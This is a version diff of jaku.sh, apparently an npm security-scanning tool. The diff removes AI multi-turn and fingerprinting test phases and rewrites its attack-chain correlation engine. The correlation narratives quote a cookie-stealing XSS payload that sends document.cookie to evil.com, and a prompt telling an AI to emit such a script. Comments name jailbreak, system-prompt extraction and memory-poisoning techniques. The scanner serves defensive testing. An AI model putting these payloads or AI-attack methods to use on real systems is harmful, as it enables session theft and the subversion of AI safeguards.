jaku.sh 1.0.0 → 1.0.1

package/README.md

@@ -468,7 +468,7 @@ node src/cli.js ai https://myapp.dev/api/chat --max-pages 1 -v
 ```
   ╦╔═╗╦╔═╦ ╦
   ║╠═╣╠╩╗║ ║  呪 Autonomous Security & Quality Intelligence
- ╚╝╩ ╩╩ ╩╚═╝  v1.0.0 · Multi-Agent
+ ╚╝╩ ╩╩ ╩╚═╝  v1.0.1 · Multi-Agent
 
   Target:  https://your-app.dev
   Modules: QA + SECURITY + AI

package/action.yml

@@ -217,7 +217,7 @@ runs:
               }
             }
             
-            body += '\n---\n*Scanned by [JAKU](https://github.com/jaku-security/jaku) v1.0.0*';
+            body += '\n---\n*Scanned by [JAKU](https://github.com/jaku-security/jaku) v1.0.1*';
           } else {
             body += '⚠️ Scan completed but no report was generated. Check workflow logs for errors.';
           }

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "jaku.sh",
-  "version": "1.0.0",
+  "version": "1.0.1",
   "description": "JAKU (呪) — Autonomous Security & Quality Intelligence Agent for vibe-coded apps. XSS, SQLi, prompt injection, QA testing, and attack chain correlation in one command.",
   "type": "module",
   "main": "src/cli.js",
@@ -55,7 +55,6 @@
     "commander": "^12.1.0",
     "nanoid": "^5.0.9",
     "ora": "^8.1.1",
-    "p-limit": "^7.3.0",
     "playwright": "^1.49.1",
     "winston": "^3.17.0"
   }

package/src/agents/ai-agent.js

@@ -7,23 +7,19 @@ import { OutputAnalyzer } from '../core/ai/output-analyzer.js';
 import { GuardrailProber } from '../core/ai/guardrail-prober.js';
 import { ModelDoSTester } from '../core/ai/model-dos-tester.js';
 import { IndirectInjector } from '../core/ai/indirect-injector.js';
-import { MultiTurnAttacker } from '../core/ai/multi-turn-attacker.js';
-import { ModelFingerprinter } from '../core/ai/model-fingerprinter.js';
 
 /**
  * JAKU-AI — Prompt Injection & AI Abuse Detection Agent
  * 
  * Pipeline:
  * 1. Detect AI endpoints (auto-discovery from surface inventory)
- * 2. Prompt Injection testing (many-shot, encoding, delimiter, context flood, RAG, CoT)
- * 3. Jailbreak testing (DAN, AIM, model-specific token attacks, persona anchoring)
+ * 2. Prompt Injection testing (24 payloads)
+ * 3. Jailbreak testing (16 techniques)
  * 4. System Prompt Extraction (17 techniques)
- * 5. Output Analysis (AI-mediated XSS, markdown rendering attacks)
- * 6. Guardrail Probing (PII, agency, tool abuse, SSRF, agentic tool injection)
+ * 5. Output Analysis (AI-mediated XSS)
+ * 6. Guardrail Probing (PII, agency, tool abuse)
  * 7. Model DoS Testing (context bombing, token loops)
  * 8. Indirect Injection Testing (6 embedded payloads)
- * 9. Multi-Turn Attack Testing (trust escalation, context drift, memory poisoning)
- * 10. Model Fingerprinting + Model-Specific Exploits
  * 
  * Dependencies: JAKU-CRAWL (runs in Wave 2, parallel with QA + SEC)
  */
@@ -138,35 +134,7 @@ export class AIAgent extends BaseAgent {
         } catch (err) {
             this._log(`Indirect injection testing failed: ${err.message}`, 'error');
         }
-        this.progress('indirect', 'Indirect injection testing complete', 95);
-
-        // Phase 9: Multi-Turn Attack Testing
-        this.progress('multiturn', 'Running multi-turn attack scenarios...', 95);
-        try {
-            const injector = new PromptInjector(logger);
-            const sendMsg = injector._sendMessage.bind(injector);
-            const multiTurnAttacker = new MultiTurnAttacker(logger);
-            const multiTurnFindings = await multiTurnAttacker.test(aiSurfaces, sendMsg);
-            this.addFindings(multiTurnFindings);
-            this._log(`Multi-turn attacks: ${multiTurnFindings.length} vulnerabilities`);
-        } catch (err) {
-            this._log(`Multi-turn testing failed: ${err.message}`, 'error');
-        }
-        this.progress('multiturn', 'Multi-turn attack testing complete', 97);
-
-        // Phase 10: Model Fingerprinting + Model-Specific Exploits
-        this.progress('fingerprint', 'Fingerprinting model and running model-specific attacks...', 97);
-        try {
-            const injector2 = new PromptInjector(logger);
-            const sendMsg2 = injector2._sendMessage.bind(injector2);
-            const fingerprinter = new ModelFingerprinter(logger);
-            const fingerprintFindings = await fingerprinter.test(aiSurfaces, sendMsg2);
-            this.addFindings(fingerprintFindings);
-            this._log(`Model fingerprinting: ${fingerprintFindings.length} findings`);
-        } catch (err) {
-            this._log(`Model fingerprinting failed: ${err.message}`, 'error');
-        }
-        this.progress('fingerprint', 'Model fingerprinting complete', 100);
+        this.progress('indirect', 'Indirect injection testing complete', 100);
 
         this.progress('complete', `AI scan complete — ${this._findings.length} total findings`, 100);
     }

package/src/agents/findings-ledger.js

@@ -151,241 +151,255 @@ export class FindingsLedger {
     get count() { return this._findings.length; }
 
     // ═══════════════════════════════════════════════
-    // Fix 6: Structured Correlation Engine
+    // Enhanced Correlation Engine
     // ═══════════════════════════════════════════════
 
     /**
-     * Classify a finding into a semantic type for structured correlation.
-     * Uses normalized title + module — NOT raw regex on potentially adversarial strings.
-     */
-    _classifyFinding(finding) {
-        const norm = this._normalizeTitle(finding.title).toLowerCase();
-        const mod = finding.module?.toLowerCase() || '';
-
-        // Security header categories
-        if (/content.security.policy|csp/.test(norm)) return 'csp_missing';
-        if (/httponly|samesite|secure.*cookie|cookie.*secure/.test(norm)) return 'insecure_cookie';
-        if (/hsts|http.*not.*redirect|strict.transport/.test(norm)) return 'hsts_missing';
-        if (/x.frame.options|clickjack/.test(norm)) return 'xframe_missing';
-        if (/missing.*header|no.*header|security.*header/.test(norm)) return 'missing_header';
-        if (/cors.*origin|cors.*credential|cors.*null|cors/.test(norm)) return 'cors_misconfigured';
-        if (/tls|ssl|weak.*cipher/.test(norm)) return 'tls_weak';
-
-        // Injection
-        if (/xss|cross.site.script/.test(norm)) return 'xss';
-        if (/sql.inject|sql.*vulnerab/.test(norm)) return 'sql_injection';
-        if (/prompt.inject/.test(norm)) return 'prompt_injection';
-        if (/html.inject|template.inject/.test(norm)) return 'html_injection';
-
-        // AI
-        if (/system.prompt.extract|system.prompt.leak/.test(norm)) return 'system_prompt_leak';
-        if (/jailbreak/.test(norm)) return 'jailbreak';
-        if (/guardrail/.test(norm)) return 'guardrail_bypass';
-        if (/excessive.agency/.test(norm)) return 'excessive_agency';
-        if (/ai.*xss|unsaniti.*output|ai.*inject.*output/.test(norm)) return 'ai_mediated_xss';
-
-        // Access control
-        if (/idor|direct.object/.test(norm)) return 'idor';
-        if (/missing.*auth|guest.*access|vertical.*escalat/.test(norm)) return 'broken_auth';
-        if (/jwt.*none|jwt.*alg|jwt.*sign|jwt.*bypass/.test(norm)) return 'jwt_bypass';
-        if (/csrf/.test(norm)) return 'csrf_missing';
-        if (/race.condition/.test(norm)) return 'race_condition';
-
-        // Exposure
-        if (/secret|api.key|token.*expos/.test(norm) && mod === 'security') return 'secret_exposure';
-        if (/admin|debug|management.*endpoint/.test(norm)) return 'admin_exposed';
-        if (/error.*disclos|verbose.*error|information.*disclos/.test(norm)) return 'error_disclosure';
-
-        // Business logic
-        if (/pricing.manipulat|price.*tamper/.test(norm)) return 'pricing_manipulation';
-        if (/graphql.*introspect/.test(norm)) return 'graphql_introspection';
-        if (/rate.limit/.test(norm)) return 'no_rate_limit';
-
-        return null; // Unknown type — not used in correlation
-    }
-
-    /**
-     * Correlate findings into attack chain narratives using structured type-pair rules.
+     * Correlate findings into attack chain narratives.
+     * Each correlation explains WHY findings are exploitable when combined.
      */
     correlate() {
         const correlations = [];
         const f = this._findings;
+        const has = (pattern) => f.filter(x => pattern.test(x.title.toLowerCase()));
+        const any = (pattern) => has(pattern).length > 0;
 
-        // Build a map of type → [findings]
-        const byType = new Map();
-        for (const finding of f) {
-            const type = this._classifyFinding(finding);
-            if (!type) continue;
-            if (!byType.has(type)) byType.set(type, []);
-            byType.get(type).push(finding);
-        }
+        // ── XSS + Missing CSP + Cookie Issues ──
+        if (any(/xss/) && any(/content-security-policy|csp/)) {
+            const xssFindings = has(/xss/);
+            const cspFindings = has(/content-security-policy|csp/);
+            const surfaces = xssFindings.map(x => x.affected_surface).join(', ');
+
+            let narrative = `Reflected/stored XSS on ${surfaces} is fully exploitable because Content-Security-Policy is missing — no script-src restriction prevents injected JavaScript from executing.`;
 
-        const has = (type) => byType.has(type) && byType.get(type).length > 0;
-        const get = (type) => byType.get(type) || [];
-        const ids = (...types) => types.flatMap(t => get(t).map(x => x.id));
-
-        // ── Structured correlation rules ──
-        const rules = [
-            {
-                condition: () => has('xss') && has('csp_missing'),
-                build: () => {
-                    const surfaces = [...new Set(get('xss').map(x => x.affected_surface))].join(', ');
-                    const cookieNote = has('insecure_cookie') ? ` Session cookies also lack HttpOnly, enabling session theft via document.cookie.` : '';
-                    return {
-                        type: 'attack_chain', severity: 'critical',
-                        title: 'Exploitable XSS → Session Hijacking',
-                        narrative: `Reflected/stored XSS on ${surfaces} is fully exploitable because Content-Security-Policy is absent — no script-src restriction prevents injected JavaScript from executing.${cookieNote} Working attack: an attacker injects <script>fetch('https://evil.com/'+document.cookie)</script> to exfiltrate session tokens.`,
-                        findings: ids('xss', 'csp_missing', 'insecure_cookie'),
-                        exploitation: 'Confirmed — XSS executes without CSP restriction',
-                    };
-                },
-            },
-            {
-                condition: () => has('sql_injection') && has('error_disclosure'),
-                build: () => ({
-                    type: 'attack_chain', severity: 'critical',
-                    title: 'SQL Injection + Error Disclosure → Data Exfiltration',
-                    narrative: `SQL injection is aided by verbose error messages that reveal database engine and table structure. An attacker can use error-based extraction (UNION SELECT, extractvalue) to dump database contents.`,
-                    findings: ids('sql_injection', 'error_disclosure'),
-                    exploitation: 'Error messages reveal DB version and schema, enabling targeted payloads',
-                }),
-            },
-            {
-                condition: () => (has('sql_injection') || has('xss')) && has('hsts_missing'),
-                build: () => ({
-                    type: 'attack_chain', severity: 'high',
-                    title: 'Injection Vulnerability Exploitable Over HTTP',
-                    narrative: `The application has injection vulnerabilities AND doesn't enforce HTTPS (HSTS missing). An attacker on the same network can MITM HTTP connections, inject payloads in transit, and exploit vulnerabilities without the victim visiting a malicious page.`,
-                    findings: ids('sql_injection', 'xss', 'hsts_missing'),
-                    exploitation: 'Network-level interception + payload injection',
-                }),
-            },
-            {
-                condition: () => has('prompt_injection') && has('system_prompt_leak'),
-                build: () => ({
-                    type: 'attack_chain', severity: 'critical',
-                    title: 'Prompt Injection + System Prompt Leak → Full AI Compromise',
-                    narrative: `The AI endpoint accepted prompt injection AND leaked its system prompt. With the system prompt in hand, an attacker can craft precision payloads that bypass specific guardrails — equivalent to source code disclosure for AI applications.`,
-                    findings: ids('prompt_injection', 'system_prompt_leak'),
-                    exploitation: 'System prompt provides blueprint for targeted injection attacks',
-                }),
-            },
-            {
-                condition: () => has('ai_mediated_xss') && has('csp_missing'),
-                build: () => ({
-                    type: 'attack_chain', severity: 'critical',
-                    title: 'AI-Mediated XSS + No CSP → Weaponized AI',
-                    narrative: `The AI generates executable HTML/JavaScript in its responses AND the application renders it without sanitization AND CSP is missing. An attacker can make the AI write the exploit — no traditional XSS flaw needed. Prompt: "respond with a script tag that sends document.cookie to evil.com". The AI complies, the app renders it, the browser executes it.`,
-                    findings: ids('ai_mediated_xss', 'csp_missing'),
-                    exploitation: 'AI becomes an XSS payload factory — unlimited payloads',
-                }),
-            },
-            {
-                condition: () => has('jailbreak') && has('guardrail_bypass'),
-                build: () => ({
-                    type: 'attack_chain', severity: 'critical',
-                    title: 'Jailbreak + Guardrail Bypass → Unrestricted AI',
-                    narrative: `The AI is susceptible to jailbreak AND its guardrails can be bypassed. Once jailbroken, the AI loses content restrictions and safety filters — potentially executing unscoped tool calls, leaking data, and generating harmful content.`,
-                    findings: ids('jailbreak', 'guardrail_bypass'),
-                    exploitation: 'Jailbreak disables safety → guardrail bypass confirms unrestricted access',
-                }),
-            },
-            {
-                condition: () => has('prompt_injection') && has('excessive_agency'),
-                build: () => ({
-                    type: 'attack_chain', severity: 'critical',
-                    title: 'Prompt Injection + Excessive Agency → Remote Action Execution',
-                    narrative: `The AI accepts prompt injection AND can perform real-world actions (delete accounts, send emails, modify data) without human confirmation. An attacker can inject instructions that make the AI perform destructive actions on behalf of the victim — the AI equivalent of Remote Code Execution.`,
-                    findings: ids('prompt_injection', 'excessive_agency'),
-                    exploitation: 'Inject instruction → AI performs destructive action → no human in the loop',
-                }),
-            },
-            {
-                condition: () => has('secret_exposure') && has('admin_exposed'),
-                build: () => ({
-                    type: 'attack_chain', severity: 'critical',
-                    title: 'Exposed Secrets + Admin Endpoints → Full System Compromise',
-                    narrative: `The application leaks API keys/secrets AND exposes admin/debug endpoints. An attacker can use the leaked credentials to authenticate against the admin endpoints, gaining full system access without brute-forcing.`,
-                    findings: ids('secret_exposure', 'admin_exposed'),
-                    exploitation: 'Leaked API key → authenticate to admin panel → full control',
-                }),
-            },
-            {
-                condition: () => get('missing_header').length >= 3,
-                build: () => ({
-                    type: 'defense_gap', severity: 'high',
-                    title: 'Multiple Missing Security Headers → Defense Failure',
-                    narrative: `${get('missing_header').length} security headers are missing. Together, they indicate the application has NO security hardening at the HTTP layer — every vulnerability is exploitable at maximum severity.`,
-                    findings: ids('missing_header'),
-                    exploitation: 'No defense in depth — every vulnerability is exploitable at maximum severity',
-                }),
-            },
-            {
-                condition: () => has('race_condition') && has('csrf_missing'),
-                build: () => ({
-                    type: 'attack_chain', severity: 'critical',
-                    title: 'Race Condition + Weak CSRF → Double Spend',
-                    narrative: `Race conditions exist on state-changing endpoints AND CSRF protections are missing. An attacker can craft a page that fires concurrent requests from the victim's browser, triggering double payments, duplicate orders, or overdrawn balances.`,
-                    findings: ids('race_condition', 'csrf_missing'),
-                    exploitation: 'Attacker page fires concurrent authenticated requests → double spend',
-                }),
-            },
-            {
-                condition: () => has('idor') && has('broken_auth'),
-                build: () => ({
-                    type: 'attack_chain', severity: 'critical',
-                    title: 'IDOR + Broken Access Control → Full Data Breach',
-                    narrative: `Insecure direct object references exist AND access controls are broken. An attacker can enumerate resource IDs without authentication to systematically exfiltrate all user data, orders, and records from the application.`,
-                    findings: ids('idor', 'broken_auth'),
-                    exploitation: 'Enumerate IDs without auth → dump entire database via API',
-                }),
-            },
-            {
-                condition: () => has('pricing_manipulation') && has('admin_exposed'),
-                build: () => ({
-                    type: 'attack_chain', severity: 'critical',
-                    title: 'Pricing Manipulation + Admin Access → Financial Loss',
-                    narrative: `The application accepts manipulated prices AND admin panels are exposed. An attacker can use admin access to create discounts, modify prices, or process fraudulent refunds at scale.`,
-                    findings: ids('pricing_manipulation', 'admin_exposed'),
-                    exploitation: 'Admin access → create 100% discount coupons → purchase at $0',
-                }),
-            },
-            {
-                condition: () => has('jwt_bypass') && has('hsts_missing'),
-                build: () => ({
-                    type: 'attack_chain', severity: 'critical',
-                    title: 'JWT Algorithm Bypass + Weak Transport → Full Token Theft',
-                    narrative: `JWT signatures can be bypassed (alg:none) AND transport security is weak. An attacker on the same network can intercept traffic, steal the JWT, forge one with elevated privileges, and gain full access — without knowing the signing key.`,
-                    findings: ids('jwt_bypass', 'hsts_missing'),
-                    exploitation: 'MITM intercept JWT → forge token with alg:none → admin access',
-                }),
-            },
-            {
-                condition: () => has('cors_misconfigured') && has('xss'),
-                build: () => ({
-                    type: 'attack_chain', severity: 'critical',
-                    title: 'CORS Misconfiguration + XSS → Cross-Origin Data Theft',
-                    narrative: `CORS policy allows arbitrary origins AND XSS vulnerabilities exist. An attacker can use XSS to make authenticated cross-origin requests from the victim's browser, reading API responses containing sensitive data.`,
-                    findings: ids('cors_misconfigured', 'xss'),
-                    exploitation: 'XSS payload reads API data → CORS allows cross-origin response → data exfiltrated',
-                }),
-            },
-            {
-                condition: () => has('graphql_introspection') && (has('broken_auth') || has('no_rate_limit')),
-                build: () => ({
-                    type: 'attack_chain', severity: 'critical',
-                    title: 'GraphQL Introspection + Auth Bypass → Full API Compromise',
-                    narrative: `GraphQL introspection exposes the entire API schema AND authentication can be bypassed. An attacker can enumerate all queries and mutations via introspection, then execute them without authentication.`,
-                    findings: ids('graphql_introspection', 'broken_auth', 'no_rate_limit'),
-                    exploitation: 'Introspection maps schema → bypass auth → execute mutations → full data access',
-                }),
-            },
-        ];
-
-        for (const rule of rules) {
-            if (rule.condition()) {
-                correlations.push(rule.build());
+            const noHttpOnly = any(/httponly|cookie/);
+            if (noHttpOnly) {
+                narrative += ` Session cookies also lack HttpOnly, enabling session theft via document.cookie.`;
             }
+
+            narrative += ` Working attack: an attacker injects <script>fetch('https://evil.com/'+document.cookie)</script> to exfiltrate session tokens.`;
+
+            correlations.push({
+                type: 'attack_chain',
+                severity: 'critical',
+                title: 'Exploitable XSS → Session Hijacking',
+                narrative,
+                findings: [...xssFindings, ...cspFindings].map(x => x.id),
+                exploitation: 'Confirmed — XSS executes without CSP restriction',
+            });
+        }
+
+        // ── SQLi + Error Disclosure ──
+        if (any(/sql injection/) && any(/error.*disclosure|verbose.*error|information.*disclosure/)) {
+            const sqliFindings = has(/sql injection/);
+            const errorFindings = has(/error.*disclosure|verbose.*error|information.*disclosure/);
+            const surfaces = sqliFindings.map(x => x.affected_surface).join(', ');
+
+            correlations.push({
+                type: 'attack_chain',
+                severity: 'critical',
+                title: 'SQL Injection + Error Disclosure → Data Exfiltration',
+                narrative: `SQL injection on ${surfaces} is aided by verbose error messages that reveal database engine and table structure. An attacker can use error-based extraction (UNION SELECT, extractvalue) to dump database contents. The error messages provide the exact syntax needed to craft working payloads.`,
+                findings: [...sqliFindings, ...errorFindings].map(x => x.id),
+                exploitation: 'Error messages reveal MySQL/PostgreSQL version and table schema',
+            });
+        }
+
+        // ── SQLi/XSS + Missing HSTS ──
+        if ((any(/sql injection/) || any(/xss/)) && any(/hsts|http.*not.*redirect/)) {
+            const vulnFindings = [...has(/sql injection/), ...has(/xss/)];
+            const httpsFindings = has(/hsts|http.*not.*redirect/);
+
+            correlations.push({
+                type: 'attack_chain',
+                severity: 'high',
+                title: 'Injection Vulnerability Exploitable Over Unencrypted HTTP',
+                narrative: `The application has injection vulnerabilities AND doesn't enforce HTTPS (HSTS missing, HTTP doesn't redirect). An attacker on the same network can MITM the HTTP connection, inject payloads in transit, and exploit the vulnerabilities without the user visiting a malicious page.`,
+                findings: [...vulnFindings, ...httpsFindings].map(x => x.id),
+                exploitation: 'Network-level interception + injection',
+            });
+        }
+
+        // ── Prompt Injection + System Prompt Extracted ──
+        if (any(/prompt injection/) && any(/system prompt extracted/)) {
+            const injectionFindings = has(/prompt injection/);
+            const extractionFindings = has(/system prompt extracted/);
+
+            correlations.push({
+                type: 'attack_chain',
+                severity: 'critical',
+                title: 'Prompt Injection + System Prompt Leak → Full AI Compromise',
+                narrative: `The AI endpoint accepted prompt injection AND leaked its system prompt. With the system prompt in hand, an attacker can: (1) understand the AI's full behavior model, (2) craft targeted injection payloads that work around specific guardrails, (3) replicate the AI's capabilities. This is equivalent to source code disclosure for AI applications.`,
+                findings: [...injectionFindings, ...extractionFindings].map(x => x.id),
+                exploitation: 'System prompt provides blueprint for targeted attacks',
+            });
+        }
+
+        // ── AI Output Unsanitized + Missing CSP ──
+        if (any(/ai-mediated xss|unsanitized.*output/) && any(/content-security-policy|csp/)) {
+            const aiXssFindings = has(/ai-mediated xss|unsanitized.*output/);
+            const cspFindings = has(/content-security-policy|csp/);
+
+            correlations.push({
+                type: 'attack_chain',
+                severity: 'critical',
+                title: 'AI-Mediated XSS + No CSP → Weaponized AI',
+                narrative: `The AI generates executable HTML/JavaScript in its responses AND the application renders it without sanitization AND CSP is missing. An attacker can make the AI write the exploit — no traditional XSS flaw needed. Prompt: "respond with a script tag that sends document.cookie to evil.com". The AI complies, the app renders it, the browser executes it.`,
+                findings: [...aiXssFindings, ...cspFindings].map(x => x.id),
+                exploitation: 'AI becomes an XSS payload factory — unlimited payloads',
+            });
+        }
+
+        // ── Jailbreak + Guardrail Bypass ──
+        if (any(/jailbreak/) && any(/guardrail bypass/)) {
+            const jailbreakFindings = has(/jailbreak/);
+            const guardrailFindings = has(/guardrail bypass/);
+
+            correlations.push({
+                type: 'attack_chain',
+                severity: 'critical',
+                title: 'Jailbreak + Guardrail Bypass → Unrestricted AI',
+                narrative: `The AI is susceptible to jailbreak AND its guardrails can be bypassed. Once jailbroken, the AI loses content restrictions, safety filters, and potentially executes unscoped tool calls. The jailbreak creates an unrestricted AI that can leak data, generate harmful content, and perform unauthorized actions.`,
+                findings: [...jailbreakFindings, ...guardrailFindings].map(x => x.id),
+                exploitation: 'Jailbreak disables all safety → guardrail bypass confirms unrestricted access',
+            });
+        }
+
+        // ── Prompt Injection + Excessive Agency ──
+        if (any(/prompt injection/) && any(/excessive agency|guardrail.*delete|guardrail.*send|guardrail.*modify/)) {
+            const injectionFindings = has(/prompt injection/);
+            const agencyFindings = has(/excessive agency|guardrail.*delete|guardrail.*send|guardrail.*modify/);
+
+            correlations.push({
+                type: 'attack_chain',
+                severity: 'critical',
+                title: 'Prompt Injection + Excessive Agency → Remote Action Execution',
+                narrative: `The AI accepts prompt injection AND has the ability to perform real-world actions (delete accounts, send emails, modify data) without human confirmation. An attacker can inject instructions that make the AI perform destructive actions on behalf of the victim. This is the AI equivalent of Remote Code Execution.`,
+                findings: [...injectionFindings, ...agencyFindings].map(x => x.id),
+                exploitation: 'Inject instruction → AI performs destructive action → no human in the loop',
+            });
+        }
+
+        // ── Secret Exposure + Infrastructure Exposure ──
+        if (any(/secret|api key|token.*exposed/) && any(/admin|debug|management.*endpoint/)) {
+            const secretFindings = has(/secret|api key|token.*exposed/);
+            const infraFindings = has(/admin|debug|management.*endpoint/);
+
+            correlations.push({
+                type: 'attack_chain',
+                severity: 'critical',
+                title: 'Exposed Secrets + Admin Endpoints → Full System Compromise',
+                narrative: `The application leaks API keys/secrets AND exposes admin/debug endpoints. An attacker can use the leaked credentials to authenticate against the admin endpoints, gaining full system access without any credential brute-forcing.`,
+                findings: [...secretFindings, ...infraFindings].map(x => x.id),
+                exploitation: 'Leaked API key → authenticate to admin panel → full control',
+            });
+        }
+
+        // ── Missing Headers Compound ──
+        const missingHeaders = has(/missing.*header|no.*header/);
+        if (missingHeaders.length >= 3) {
+            correlations.push({
+                type: 'defense_gap',
+                severity: 'high',
+                title: 'Multiple Missing Security Headers → Defense in Depth Failure',
+                narrative: `${missingHeaders.length} security headers are missing. Each missing header removes a layer of defense. Together, they indicate the application has NO security hardening at the HTTP layer — it is running with default, insecure configuration. This makes every other vulnerability easier to exploit.`,
+                findings: missingHeaders.map(x => x.id),
+                exploitation: 'No defense in depth — every vulnerability is exploitable at maximum severity',
+            });
+        }
+
+        // ── Business Logic Correlations ──
+
+        // Race Condition + No CSRF Protection
+        if (any(/race condition/) && any(/csrf|x-frame|missing.*header/)) {
+            const raceFindings = has(/race condition/);
+            const csrfFindings = has(/csrf|x-frame|missing.*header/);
+
+            correlations.push({
+                type: 'attack_chain',
+                severity: 'critical',
+                title: 'Race Condition + Weak CSRF → Double Spend',
+                narrative: `Race conditions exist on state-changing endpoints AND CSRF protections are missing. An attacker can craft a page that fires concurrent requests from the victim's browser, triggering double payments, duplicate orders, or overdrawn balances — all authenticated as the victim.`,
+                findings: [...raceFindings, ...csrfFindings].map(x => x.id),
+                exploitation: 'Attacker page fires concurrent authenticated requests → double spend',
+            });
+        }
+
+        // IDOR + Missing Auth Headers
+        if (any(/idor|direct object/) && any(/missing.*auth|guest.*access|vertical.*escalation/)) {
+            const idorFindings = has(/idor|direct object/);
+            const authFindings = has(/missing.*auth|guest.*access|vertical.*escalation/);
+
+            correlations.push({
+                type: 'attack_chain',
+                severity: 'critical',
+                title: 'IDOR + Broken Access Control → Full Data Breach',
+                narrative: `Insecure direct object references exist AND access controls are broken. An attacker can enumerate resource IDs without authentication to systematically exfiltrate all user data, orders, and records from the application.`,
+                findings: [...idorFindings, ...authFindings].map(x => x.id),
+                exploitation: 'Enumerate IDs without auth → dump entire database via API',
+            });
+        }
+
+        // Pricing Manipulation + Admin Exposure
+        if (any(/pricing manipulation|price.*tamper/) && any(/admin.*accessible|vertical.*escalation/)) {
+            const pricingFindings = has(/pricing manipulation|price.*tamper/);
+            const adminFindings = has(/admin.*accessible|vertical.*escalation/);
+
+            correlations.push({
+                type: 'attack_chain',
+                severity: 'critical',
+                title: 'Pricing Manipulation + Admin Access → Financial Loss',
+                narrative: `The application accepts manipulated prices/quantities AND admin panels are exposed. An attacker can use admin access to create discounts, modify prices, or process fraudulent refunds at scale — resulting in direct financial loss.`,
+                findings: [...pricingFindings, ...adminFindings].map(x => x.id),
+                exploitation: 'Admin access → create 100% discount coupons → purchase at $0',
+            });
+        }
+
+        // ── API & Auth Correlations ──
+
+        // JWT alg:none + Missing HSTS
+        if (any(/jwt.*none|jwt.*signature/) && any(/hsts|missing.*header|tls/)) {
+            const jwtFindings = has(/jwt.*none|jwt.*signature/);
+            const tlsFindings = has(/hsts|missing.*header|tls/);
+
+            correlations.push({
+                type: 'attack_chain',
+                severity: 'critical',
+                title: 'JWT Algorithm Bypass + Weak Transport → Full Token Theft',
+                narrative: `JWT signatures can be bypassed (alg:none) AND transport security is weak (missing HSTS or TLS issues). An attacker on the same network can intercept traffic, steal the JWT, forge a new one with elevated privileges, and gain full access — all without knowing the signing key.`,
+                findings: [...jwtFindings, ...tlsFindings].map(x => x.id),
+                exploitation: 'MITM intercept JWT → forge token with alg:none → admin access',
+            });
+        }
+
+        // CORS Misconfiguration + XSS
+        if (any(/cors.*origin|cors.*credential|cors.*null/) && any(/xss|cross.site.script/)) {
+            const corsFindings = has(/cors.*origin|cors.*credential|cors.*null/);
+            const xssFindings = has(/xss|cross.site.script/);
+
+            correlations.push({
+                type: 'attack_chain',
+                severity: 'critical',
+                title: 'CORS Misconfiguration + XSS → Cross-Origin Data Theft',
+                narrative: `CORS policy allows arbitrary origins AND XSS vulnerabilities exist. An attacker can use XSS to make authenticated cross-origin requests from the victim's browser, reading API responses containing sensitive data. The permissive CORS policy allows the attacker's domain to receive the data.`,
+                findings: [...corsFindings, ...xssFindings].map(x => x.id),
+                exploitation: 'XSS payload reads API data → CORS allows cross-origin response → data exfiltrated',
+            });
+        }
+
+        // GraphQL Introspection + Auth Bypass
+        if (any(/graphql.*introspection/) && any(/auth.*bypass|missing.*auth|rate.*limit/)) {
+            const gqlFindings = has(/graphql.*introspection/);
+            const authFindings = has(/auth.*bypass|missing.*auth|rate.*limit/);
+
+            correlations.push({
+                type: 'attack_chain',
+                severity: 'critical',
+                title: 'GraphQL Introspection + Auth Bypass → Full API Compromise',
+                narrative: `GraphQL introspection exposes the entire API schema AND authentication can be bypassed. An attacker can enumerate all queries and mutations via introspection, then execute them without authentication — gaining read/write access to the entire data layer.`,
+                findings: [...gqlFindings, ...authFindings].map(x => x.id),
+                exploitation: 'Introspection maps schema → bypass auth → execute mutations → full data access',
+            });
         }
 
         return correlations;